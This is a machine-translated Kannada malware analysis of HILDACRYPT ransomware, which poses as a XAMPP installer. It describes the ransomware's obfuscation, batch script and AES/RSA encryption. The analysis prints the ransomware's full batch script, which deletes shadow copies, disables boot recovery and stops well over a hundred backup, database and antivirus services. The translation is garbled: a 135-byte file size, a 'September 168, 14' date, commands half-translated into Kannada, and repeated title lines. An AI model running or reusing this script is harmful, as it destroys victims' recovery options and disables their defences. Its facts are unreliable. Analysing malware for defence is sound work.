ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಹಲೋ, ಹಬ್ರ್! ಮತ್ತೊಮ್ಮೆ, ನಾವು Ransomware ವರ್ಗದಿಂದ ಮಾಲ್‌ವೇರ್‌ನ ಇತ್ತೀಚಿನ ಆವೃತ್ತಿಗಳ ಕುರಿತು ಮಾತನಾಡುತ್ತಿದ್ದೇವೆ. HILDACRYPT ಒಂದು ಹೊಸ ransomware ಆಗಿದ್ದು, ಆಗಸ್ಟ್ 2019 ರಲ್ಲಿ ಪತ್ತೆಯಾದ ಹಿಲ್ಡಾ ಕುಟುಂಬದ ಸದಸ್ಯ, ಸಾಫ್ಟ್‌ವೇರ್ ಅನ್ನು ವಿತರಿಸಲು ಬಳಸಲಾದ ನೆಟ್‌ಫ್ಲಿಕ್ಸ್ ಕಾರ್ಟೂನ್ ನಂತರ ಹೆಸರಿಸಲಾಗಿದೆ. ಇಂದು ನಾವು ಈ ನವೀಕರಿಸಿದ ransomware ವೈರಸ್‌ನ ತಾಂತ್ರಿಕ ವೈಶಿಷ್ಟ್ಯಗಳೊಂದಿಗೆ ಪರಿಚಯ ಮಾಡಿಕೊಳ್ಳುತ್ತಿದ್ದೇವೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಹಿಲ್ಡಾ ransomware ನ ಮೊದಲ ಆವೃತ್ತಿಯಲ್ಲಿ, Youtube ನಲ್ಲಿ ಪೋಸ್ಟ್ ಮಾಡಲಾದ ಒಂದರ ಲಿಂಕ್ ಟ್ರೈಲರ್ ಕಾರ್ಟೂನ್ ಸರಣಿಯನ್ನು ಸುಲಿಗೆ ಪತ್ರದಲ್ಲಿ ಒಳಗೊಂಡಿತ್ತು. HILDACRYPT ಒಂದು ಕಾನೂನುಬದ್ಧ XAMPP ಅನುಸ್ಥಾಪಕವಾಗಿ ಮಾಸ್ಕ್ವೆರೇಡ್ ಮಾಡುತ್ತದೆ, ಇದು MariaDB, PHP ಮತ್ತು ಪರ್ಲ್ ಅನ್ನು ಒಳಗೊಂಡಿರುವ ಒಂದು ಸುಲಭವಾದ ಅನುಸ್ಥಾಪಿಸಲು Apache ವಿತರಣೆಯಾಗಿದೆ. ಅದೇ ಸಮಯದಲ್ಲಿ, ಕ್ರಿಪ್ಟೋಲಾಕರ್ ಬೇರೆ ಫೈಲ್ ಹೆಸರನ್ನು ಹೊಂದಿದೆ - xamp. ಜೊತೆಗೆ, ransomware ಫೈಲ್ ಎಲೆಕ್ಟ್ರಾನಿಕ್ ಸಹಿಯನ್ನು ಹೊಂದಿಲ್ಲ.

ಸ್ಥಾಯೀ ವಿಶ್ಲೇಷಣೆ

MS Windows ಗಾಗಿ ಬರೆಯಲಾದ PE32 .NET ಫೈಲ್‌ನಲ್ಲಿ ransomware ಇದೆ. ಇದರ ಗಾತ್ರ 135 ಬೈಟ್‌ಗಳು. ಮುಖ್ಯ ಪ್ರೋಗ್ರಾಂ ಕೋಡ್ ಮತ್ತು ಡಿಫೆಂಡರ್ ಪ್ರೋಗ್ರಾಂ ಕೋಡ್ ಎರಡನ್ನೂ C# ನಲ್ಲಿ ಬರೆಯಲಾಗಿದೆ. ಸಂಕಲನ ದಿನಾಂಕ ಮತ್ತು ಸಮಯದ ಸ್ಟ್ಯಾಂಪ್ ಪ್ರಕಾರ, ಬೈನರಿಯನ್ನು ಸೆಪ್ಟೆಂಬರ್ 168, 14 ರಂದು ರಚಿಸಲಾಗಿದೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಡಿಟೆಕ್ಟ್ ಇಟ್ ಈಸಿ ಪ್ರಕಾರ, ರಾನ್ಸಮ್‌ವೇರ್ ಅನ್ನು ಕನ್‌ಫ್ಯೂಸರ್ ಮತ್ತು ಕನ್‌ಫ್ಯೂಸರ್‌ಎಕ್ಸ್ ಬಳಸಿ ಆರ್ಕೈವ್ ಮಾಡಲಾಗಿದೆ, ಆದರೆ ಈ ಅಬ್ಫ್ಯೂಸ್ಕೇಟರ್‌ಗಳು ಮೊದಲಿನಂತೆಯೇ ಇರುತ್ತವೆ, ಕನ್‌ಫ್ಯೂಸರ್‌ಎಕ್ಸ್ ಮಾತ್ರ ಕನ್‌ಫ್ಯೂಸರ್‌ನ ಉತ್ತರಾಧಿಕಾರಿಯಾಗಿದೆ, ಆದ್ದರಿಂದ ಅವರ ಕೋಡ್ ಸಿಗ್ನೇಚರ್‌ಗಳು ಹೋಲುತ್ತವೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

HILDACRYPT ಅನ್ನು ConfuserEx ನೊಂದಿಗೆ ಪ್ಯಾಕ್ ಮಾಡಲಾಗಿದೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

ದಾಳಿ ವೆಕ್ಟರ್

ಹೆಚ್ಚಾಗಿ, ransomware ಅನ್ನು ವೆಬ್ ಪ್ರೋಗ್ರಾಮಿಂಗ್ ಸೈಟ್‌ಗಳಲ್ಲಿ ಒಂದರಲ್ಲಿ ಕಂಡುಹಿಡಿಯಲಾಯಿತು, ಇದು ಕಾನೂನುಬದ್ಧ XAMPP ಪ್ರೋಗ್ರಾಂ ಎಂದು ಮರೆಮಾಚುತ್ತದೆ.

ಸೋಂಕಿನ ಸಂಪೂರ್ಣ ಸರಪಳಿಯನ್ನು ಕಾಣಬಹುದು app.any.run ಸ್ಯಾಂಡ್‌ಬಾಕ್ಸ್.

ಅಸ್ಪಷ್ಟತೆ

ransomware ಸ್ಟ್ರಿಂಗ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ರೂಪದಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗುತ್ತದೆ. ಪ್ರಾರಂಭಿಸಿದಾಗ, HILDACRYPT ಅವುಗಳನ್ನು Base64 ಮತ್ತು AES-256-CBC ಬಳಸಿ ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಸೆಟ್ಟಿಂಗ್

ಮೊದಲನೆಯದಾಗಿ, ransomware %AppDataRoaming% ನಲ್ಲಿ ಫೋಲ್ಡರ್ ಅನ್ನು ರಚಿಸುತ್ತದೆ, ಇದರಲ್ಲಿ GUID (ಜಾಗತಿಕವಾಗಿ ವಿಶಿಷ್ಟ ಗುರುತಿಸುವಿಕೆ) ನಿಯತಾಂಕವನ್ನು ಯಾದೃಚ್ಛಿಕವಾಗಿ ರಚಿಸಲಾಗುತ್ತದೆ. ಈ ಸ್ಥಳಕ್ಕೆ ಬ್ಯಾಟ್ ಫೈಲ್ ಅನ್ನು ಸೇರಿಸುವ ಮೂಲಕ, ransomware ವೈರಸ್ cmd.exe ಅನ್ನು ಬಳಸಿಕೊಂಡು ಅದನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ:

cmd.exe /c JKfgkgj3hjgfhjka.bat & ನಿರ್ಗಮಿಸಿ

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ
ಇದು ನಂತರ ಸಿಸ್ಟಮ್ ವೈಶಿಷ್ಟ್ಯಗಳು ಅಥವಾ ಸೇವೆಗಳನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ಬ್ಯಾಚ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಪ್ರಾರಂಭಿಸುತ್ತದೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಸ್ಕ್ರಿಪ್ಟ್ ನೆರಳು ನಕಲುಗಳನ್ನು ನಾಶಪಡಿಸುವ, SQL ಸರ್ವರ್, ಬ್ಯಾಕಪ್ ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸುವ ಆದೇಶಗಳ ದೀರ್ಘ ಪಟ್ಟಿಯನ್ನು ಒಳಗೊಂಡಿದೆ.

ಉದಾಹರಣೆಗೆ, ಅಕ್ರೊನಿಸ್ ಬ್ಯಾಕಪ್ ಸೇವೆಗಳನ್ನು ನಿಲ್ಲಿಸಲು ಇದು ವಿಫಲವಾಗಿದೆ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಇದು ಕೆಳಗಿನ ಮಾರಾಟಗಾರರಿಂದ ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಆಕ್ರಮಿಸುತ್ತದೆ: ವೀಮ್, ಸೋಫೋಸ್, ಕ್ಯಾಸ್ಪರ್ಸ್ಕಿ, ಮ್ಯಾಕ್‌ಅಫೀ ಮತ್ತು ಇತರರು.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

ಮೇಲೆ ತಿಳಿಸಲಾದ ಸೇವೆಗಳು ಮತ್ತು ಪ್ರಕ್ರಿಯೆಗಳನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದ ನಂತರ, ಕ್ರಿಪ್ಟೋಲಾಕರ್ ಎಲ್ಲಾ ಅಗತ್ಯ ಸೇವೆಗಳು ಡೌನ್ ಆಗಿರುವುದನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಲು ಟಾಸ್ಕ್‌ಲಿಸ್ಟ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಎಲ್ಲಾ ಚಾಲನೆಯಲ್ಲಿರುವ ಪ್ರಕ್ರಿಯೆಗಳ ಕುರಿತು ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ.
ಕಾರ್ಯಪಟ್ಟಿ v/fo csv

ಈ ಆಜ್ಞೆಯು ಚಾಲನೆಯಲ್ಲಿರುವ ಪ್ರಕ್ರಿಯೆಗಳ ವಿವರವಾದ ಪಟ್ಟಿಯನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತದೆ, ಅದರ ಅಂಶಗಳನ್ನು "" ಚಿಹ್ನೆಯಿಂದ ಬೇರ್ಪಡಿಸಲಾಗುತ್ತದೆ.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಈ ಪರಿಶೀಲನೆಯ ನಂತರ, ransomware ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ.

ಗೂ ry ಲಿಪೀಕರಣ

ಫೈಲ್ ಎನ್‌ಕ್ರಿಪ್ಶನ್

ರಿಸೈಕಲ್.ಬಿನ್ ಮತ್ತು ರೆಫರೆನ್ಸ್ ಅಸೆಂಬ್ಲಿಗಳು ಮೈಕ್ರೋಸಾಫ್ಟ್ ಫೋಲ್ಡರ್‌ಗಳನ್ನು ಹೊರತುಪಡಿಸಿ, ಹಾರ್ಡ್ ಡ್ರೈವ್‌ಗಳ ಎಲ್ಲಾ ಕಂಡುಬರುವ ವಿಷಯಗಳ ಮೂಲಕ HILDACRYPT ಹೋಗುತ್ತದೆ. ಎರಡನೆಯದು ransomware ಕಾರ್ಯಾಚರಣೆಯ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುವ .Net ಅಪ್ಲಿಕೇಶನ್‌ಗಳಿಗಾಗಿ ನಿರ್ಣಾಯಕ dll, pdb, ಇತ್ಯಾದಿ ಫೈಲ್‌ಗಳನ್ನು ಒಳಗೊಂಡಿದೆ. ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾದ ಫೈಲ್‌ಗಳನ್ನು ಹುಡುಕಲು, ಈ ಕೆಳಗಿನ ವಿಸ್ತರಣೆಗಳ ಪಟ್ಟಿಯನ್ನು ಬಳಸಲಾಗುತ್ತದೆ:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

ಬಳಕೆದಾರರ ಫೈಲ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲು ransomware AES-256-CBC ಅಲ್ಗಾರಿದಮ್ ಅನ್ನು ಬಳಸುತ್ತದೆ. ಪ್ರಮುಖ ಗಾತ್ರವು 256 ಬಿಟ್‌ಗಳು ಮತ್ತು ಪ್ರಾರಂಭಿಕ ವೆಕ್ಟರ್ (IV) ಗಾತ್ರವು 16 ಬೈಟ್‌ಗಳು.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಕೆಳಗಿನ ಸ್ಕ್ರೀನ್‌ಶಾಟ್‌ನಲ್ಲಿ, GetBytes() ಅನ್ನು ಬಳಸಿಕೊಂಡು ಬೈಟ್_2 ಮತ್ತು ಬೈಟ್_1 ಮೌಲ್ಯಗಳನ್ನು ಯಾದೃಚ್ಛಿಕವಾಗಿ ಪಡೆಯಲಾಗಿದೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಕೀ

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ВИ

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್ HCY ವಿಸ್ತರಣೆಯನ್ನು ಹೊಂದಿದೆ!.. ಇದು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ಗೆ ಉದಾಹರಣೆಯಾಗಿದೆ. ಮೇಲೆ ತಿಳಿಸಲಾದ ಕೀ ಮತ್ತು IV ಅನ್ನು ಈ ಫೈಲ್‌ಗಾಗಿ ರಚಿಸಲಾಗಿದೆ.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಕೀ ಎನ್ಕ್ರಿಪ್ಶನ್

ಕ್ರಿಪ್ಟೋಲಾಕರ್ ರಚಿಸಿದ AES ಕೀಲಿಯನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ನಲ್ಲಿ ಸಂಗ್ರಹಿಸುತ್ತದೆ. ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾದ ಫೈಲ್‌ನ ಮೊದಲ ಭಾಗವು XML ಸ್ವರೂಪದಲ್ಲಿ HILDACRYPT, KEY, IV, FileLen ನಂತಹ ಡೇಟಾವನ್ನು ಒಳಗೊಂಡಿರುವ ಹೆಡರ್ ಅನ್ನು ಹೊಂದಿದೆ ಮತ್ತು ಈ ರೀತಿ ಕಾಣುತ್ತದೆ:

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

AES ಮತ್ತು IV ಕೀ ಗೂಢಲಿಪೀಕರಣವನ್ನು RSA-2048 ಬಳಸಿ ಮಾಡಲಾಗುತ್ತದೆ ಮತ್ತು ಎನ್‌ಕೋಡಿಂಗ್ ಅನ್ನು Base64 ಬಳಸಿ ಮಾಡಲಾಗುತ್ತದೆ. RSA ಸಾರ್ವಜನಿಕ ಕೀಲಿಯನ್ನು XML ಸ್ವರೂಪದಲ್ಲಿ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಸ್ಟ್ರಿಂಗ್‌ಗಳಲ್ಲಿ ಕ್ರಿಪ್ಟೋಲಾಕರ್‌ನ ದೇಹದಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗುತ್ತದೆ.

